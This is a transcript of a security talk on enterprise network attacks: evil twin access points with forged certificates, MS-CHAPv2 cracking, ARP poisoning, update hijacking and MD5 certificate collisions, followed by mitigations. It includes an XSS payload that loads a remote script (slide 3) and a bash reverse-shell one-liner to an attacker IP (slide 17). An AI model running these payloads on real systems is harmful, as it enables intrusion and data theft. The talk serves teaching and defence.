Breaking Bad: Enterprise Network Security
Transcript of Breaking Bad: Enterprise Network Security
![Page 1: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/1.jpg)
Enterprise Network Security
Navneet Kumar
![Page 2: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/2.jpg)
Overview
• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis: MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack
Note: Some images in this presentation have been taken from the web for illustration
![Page 3: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/3.jpg)
SilverFish Worm
Stages: XSS → NPAPI runtime → Shell
XSS: <img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
NPAPI runtime: masterPlugin.updatePlugin("attacker-plugin", success, failure)
Shell: Netcat shell / ssh daemon / Bonjour
Hatching rate = n^g, where n = average number of endpoints per meeting and g = generation number (g = 0, 1, 2, ...)
![Page 4: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/4.jpg)
Target Protocols / Attack Vectors
• 802.11
• ARP
![Page 5: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/5.jpg)
802.11
![Page 6: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/6.jpg)
Evil twin attack
![Page 7: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/7.jpg)
Fake Certificate Exchange
![Page 8: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/8.jpg)
Attack Setup
Soft AP
• Put WNIC in master mode and use forged CA cert
• Configure AP SSID to "bjn-int"
• Deauth (802.11 deauthentication) against the actual AP
Network
• Set up DNS
• Set up DHCP
Routing
• Redirect port 80 and 443 packets to the proxy port
• Forward traffic after NAT
Capture
• Use the same CA cert for signing
• Sniff in the proxy
Note: Chrome uses certificate pinning for *.google.com
![Page 9: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/9.jpg)
Wireless Scan
Fake BSSID (highest signal strength, 2.4 GHz channel)
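The scan above shows the rogue BSSID advertising the corporate SSID with the strongest signal. As an added defender-side example (not from the slides), this Python function compares a scan against an AP inventory and flags any BSSID that beacons a protected SSID without being in the inventory; the scan records, the inventory and the "bjn-int" allow-list are constructed for the example.

```python
from collections import defaultdict

# Constructed sample scan, in the shape a wireless scanner reports (not real data).
SCAN = [
    {"ssid": "bjn-int", "bssid": "00:11:22:33:44:01", "channel": 1, "signal": -60},
    {"ssid": "bjn-int", "bssid": "00:11:22:33:44:02", "channel": 6, "signal": -62},
    {"ssid": "bjn-int", "bssid": "de:ad:be:ef:00:01", "channel": 6, "signal": -35},  # rogue
    {"ssid": "guest", "bssid": "00:11:22:33:44:03", "channel": 11, "signal": -70},
]

# Hypothetical inventory of managed access points (what a WIPS allow-list holds).
AUTHORIZED_BSSIDS = {"00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"}
PROTECTED_SSIDS = {"bjn-int"}


def find_evil_twins(scan, authorized, protected):
    """Return one finding per BSSID that advertises a protected SSID but is not a
    managed AP. Each finding also records whether the rogue is louder than the
    strongest legitimate AP for that SSID, the pattern the slide's scan shows."""
    best_legit = defaultdict(lambda: None)  # ssid -> strongest authorized signal (dBm)
    for r in scan:
        if r["bssid"] in authorized:
            cur = best_legit[r["ssid"]]
            if cur is None or r["signal"] > cur:
                best_legit[r["ssid"]] = r["signal"]

    findings = []
    for r in scan:
        if r["ssid"] in protected and r["bssid"] not in authorized:
            legit = best_legit[r["ssid"]]
            findings.append({
                "ssid": r["ssid"],
                "bssid": r["bssid"],
                "channel": r["channel"],
                "signal": r["signal"],
                "louder_than_legit": legit is not None and r["signal"] > legit,
            })
    return findings


if __name__ == "__main__":
    for f in find_evil_twins(SCAN, AUTHORIZED_BSSIDS, PROTECTED_SSIDS):
        print("possible evil twin:", f)
```

A BSSID that is unknown to the inventory, beacons the corporate SSID and out-powers every managed AP is the combination worth alerting on; a single unknown BSSID with a weak signal is more often a neighbour.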
![Page 10: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/10.jpg)
Victim’s Client
![Page 11: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/11.jpg)
WTF !!!
Certificate Forgery
![Page 12: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/12.jpg)
Soft AP → DHCP → Routing → Proxy
![Page 13: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/13.jpg)
Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[0:8]
ChallengeHash → ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike
![Page 14: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/14.jpg)
Cryptanalysis of MS-CHAPv2
Note: Original complexity analysis has been done by Moxie Marlinspike
NT hash split into three DES keys: 7 bytes | 7 bytes | 2 bytes (zero-padded to 7)
Complexity = 2^56
time < 24 hrs (100% success)
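As an added example (not from the slides), this Python code walks through the RFC 2759 structure the two slides summarise: the ChallengeHash that every DES block encrypts, the 16-byte NT hash padded to 21 bytes and cut into three DES keys, and why the third key holds only 16 secret bits, so the total effort collapses to the single 2^56 DES keyspace the slide states. The sample challenge and NT-hash bytes are constructed.

```python
import hashlib


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: bytes) -> bytes:
    """RFC 2759 ChallengeHash: SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[0:8].

    Both challenges are 16 bytes. The 8-byte result is the single DES plaintext
    that all three ChallengeResponse blocks encrypt.
    """
    if len(peer_challenge) != 16 or len(auth_challenge) != 16:
        raise ValueError("MS-CHAPv2 challenges are 16 bytes each")
    return hashlib.sha1(peer_challenge + auth_challenge + username).digest()[:8]


def split_nt_hash(nt_hash: bytes):
    """Zero-pad the 16-byte NT hash to 21 bytes and cut it into the three 7-byte
    DES keys K1, K2, K3 (the slide's 7 byte | 7 byte | 2 byte picture)."""
    if len(nt_hash) != 16:
        raise ValueError("NT hash is 16 bytes")
    padded = nt_hash + b"\x00" * 5
    return padded[0:7], padded[7:14], padded[14:21]


def secret_bits_per_key():
    """Unknown key bits per DES key: K1 and K2 are fully secret (56 bits each);
    K3 has 2 secret bytes followed by 5 bytes known to be zero (16 bits)."""
    secret_bytes = (7, 7, 2)
    return tuple(8 * b for b in secret_bytes)


def effective_work_bits() -> int:
    """log2 of the total brute-force effort. All three keys encrypt the same
    ChallengeHash, so one sweep over the 2^56 DES keyspace checks each candidate
    against both the K1 and K2 ciphertexts; K3 costs a further 2^16 trials.
    The sum 2^56 + 2^16 rounds to the slide's Complexity = 2^56."""
    k1, _k2, k3 = secret_bits_per_key()
    total = 2 ** k1 + 2 ** k3  # K2 is recovered in the same sweep, not counted twice
    return total.bit_length() - 1


if __name__ == "__main__":
    # Constructed sample values; real challenges are random per session.
    ch = challenge_hash(b"P" * 16, b"A" * 16, b"user")
    k1, k2, k3 = split_nt_hash(bytes(range(16)))
    print("ChallengeHash:", ch.hex(), "| K3:", k3.hex(), "| work bits:", effective_work_bits())
```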
![Page 15: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/15.jpg)
ARP poisoning
![Page 16: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/16.jpg)
POST-MITM Attack Vectors
Reverse Shell
Bind Shell
Session Hijacking
Above L3 Attacks
![Page 17: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/17.jpg)
Reverse Bind Shell
• Gives a network shell to the attacker
• Works behind NAT
• Gets root access
HOW ????
$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1
![Page 18: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/18.jpg)
(Auto)Updates: deploy payload with updates
https://tools.google.com/service/update2
https://swdl.bluejeans.com
https://aus4.mozilla.org/update/*/update.xml
smb://MVAV01/SophosUpdate
![Page 19: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/19.jpg)
Mitigation
• Pre-deployment of enterprise-wide CA
• SSL cert pinning for updates
• Proper WIPS configuration
• ARP spoof mitigations
• Careful CA signing
![Page 20: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/20.jpg)
Certificate Collision Attack
DomainA → CSR → CA (CSR.TBS carries isCA? = False)
CA issues Certificate = CSR.TBS || E_key[Sha(csr.tbs)] (the CA signs the hash of the to-be-signed part)
Sha(domainA.csr) ≠ Sha(domainB.csr), but with a weak hash md5(domainA.csr) = md5(domainB.csr)
MD5 collision → Certificate collision: the signature over DomainA's CSR also validates DomainB's TBS, including one with isCA? = True
![Page 21: Breaking Bad: Enterprise Network Security](https://reader037.fdocuments.in/reader037/viewer/2022102917/58ef79c31a28ab97398b461d/html5/thumbnails/21.jpg)